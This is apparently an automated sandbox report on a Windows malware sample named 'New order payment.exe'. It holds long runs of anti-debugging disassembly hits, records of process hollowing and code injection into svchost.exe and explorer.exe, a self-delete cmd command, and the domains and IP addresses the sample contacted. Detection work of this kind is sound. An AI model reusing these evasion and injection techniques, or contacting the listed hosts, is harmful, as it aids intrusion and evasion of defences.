          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00A33D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_009AC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_009AC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00A50EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00A50EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00A50EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00A046A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00A1FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_009B36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_009C8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00A3FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00A58ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_009B16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_009976E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_009BA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_009BA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_0098C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_0098C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_0098C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_009B8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00A3FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00A41608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_0098E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00997E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00997E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00997E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00997E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00997E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00997E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00A4AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00A4AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_009AAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_009AAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_009AAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_009AAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_009AAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_0099766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00998794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00A07794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00A07794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00A07794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_009C37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_009AF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_009BA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_009BA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_009AB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_009AB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00A5070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00A5070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_009BE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00A1FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00A1FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00984F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00984F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00A58F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_0099EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_0099FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038E138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_03831B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_03831B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038DD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_03852397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_0385B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_03854BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_03854BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_03854BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038F5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038A53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038A53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_0384DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038D23E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038D23E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038D23E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038E131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_0382DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038F8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_0382F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_0382DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_03853B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_03853B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_0385D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_0385D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_0383AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_0383AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_0385FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_03852ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_03852AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_03838A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_03825210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_03825210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_03825210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_03825210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_0382AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_0382AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_03843A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038EAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038EAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_03864A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_03864A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_0384A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_0384A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_0384A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_0384A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_0384A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_0384A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_0384A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_0384A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_0384A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_03829240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_03829240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_03829240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_03829240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038EEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038B4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038DB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038DB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038F8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_0386927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_0385A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_0384C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_03852990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038561A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038561A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038E49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038E49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038E49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038E49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038A69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038A51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038A51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038A51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038A51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038499BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038499BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038499BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038499BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038499BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038B41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_0382B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_0382B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_0382B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_03829100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_03829100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_03829100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_03844120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_03844120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_03844120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_03844120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_03844120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_0385513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_0385513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_0384B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_0384B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_0382C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_0382B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_0382B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_03829080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038A3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038A3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe  Code function: 14_2_038520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Process queried: DebugPort
          Source: C:\Windows\SysWOW64\svchost.exe  Process queried: DebugPort
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00409B30 LdrLoadDll,

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe  Domain query: www.hanansalman.com
          Source: C:\Windows\explorer.exe  Domain query: www.sejiw3.xyz
          Source: C:\Windows\explorer.exe  Domain query: www.crisisinterventionadvocates.com
          Source: C:\Windows\explorer.exe  Network Connect: 137.184.31.35 80
          Source: C:\Windows\explorer.exe  Network Connect: 160.153.136.3 80
          Source: C:\Windows\explorer.exe  Domain query: www.srchwithus.online
          Source: C:\Windows\explorer.exe  Domain query: www.heyunshangcheng.info
          Source: C:\Windows\explorer.exe  Network Connect: 51.210.240.92 80
          Source: C:\Windows\explorer.exe  Network Connect: 74.208.236.134 80
          Source: C:\Windows\explorer.exe  Network Connect: 3.67.234.155 80
          Source: C:\Windows\explorer.exe  Network Connect: 35.241.55.103 80
          Source: C:\Windows\explorer.exe  Domain query: www.christinegagnonjewellery.com
          Source: C:\Windows\explorer.exe  Domain query: www.mykombuchafactory.com
          Source: C:\Windows\explorer.exe  Domain query: www.itskosi.com
          Source: C:\Windows\explorer.exe  Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe  Domain query: www.salvationshippingsecurity.com
          Source: C:\Windows\explorer.exe  Domain query: www.sfcn-dng.com
          Source: C:\Windows\explorer.exe  Domain query: www.umgaleloacademy.com
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\New order payment.exe  Section unmapped: C:\Windows\SysWOW64\svchost.exe base address: 9B0000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\New order payment.exe  Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\New order payment.exe  Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\New order payment.exe  Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exe  Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\svchost.exe  Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign process
          Source: C:\Users\user\Desktop\New order payment.exe  Memory written: C:\Users\user\Desktop\New order payment.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\New order payment.exe  Thread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\New order payment.exe  Thread register set: target process: 3472
          Source: C:\Windows\SysWOW64\svchost.exe  Thread register set: target process: 3472
          Source: C:\Users\user\Desktop\New order payment.exe  Process created: C:\Users\user\Desktop\New order payment.exe 'C:\Users\user\Desktop\New order payment.exe'
          Source: C:\Windows\SysWOW64\svchost.exe  Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\New order payment.exe'
          Source: explorer.exe, 00000004.00000000.262322329.0000000001640000.00000002.00020000.sdmp, svchost.exe, 0000000E.00000002.505777077.0000000005F20000.00000002.00020000.sdmp  Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.262322329.0000000001640000.00000002.00020000.sdmp, svchost.exe, 0000000E.00000002.505777077.0000000005F20000.00000002.00020000.sdmp  Binary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.262322329.0000000001640000.00000002.00020000.sdmp, svchost.exe, 0000000E.00000002.505777077.0000000005F20000.00000002.00020000.sdmp  Binary or memory string: SProgram Managerl
          Source: explorer.exe, 00000004.00000000.280314359.0000000001128000.00000004.00000020.sdmp  Binary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000004.00000000.262322329.0000000001640000.00000002.00020000.sdmp, svchost.exe, 0000000E.00000002.505777077.0000000005F20000.00000002.00020000.sdmp  Binary or memory string: Shell_TrayWnd,
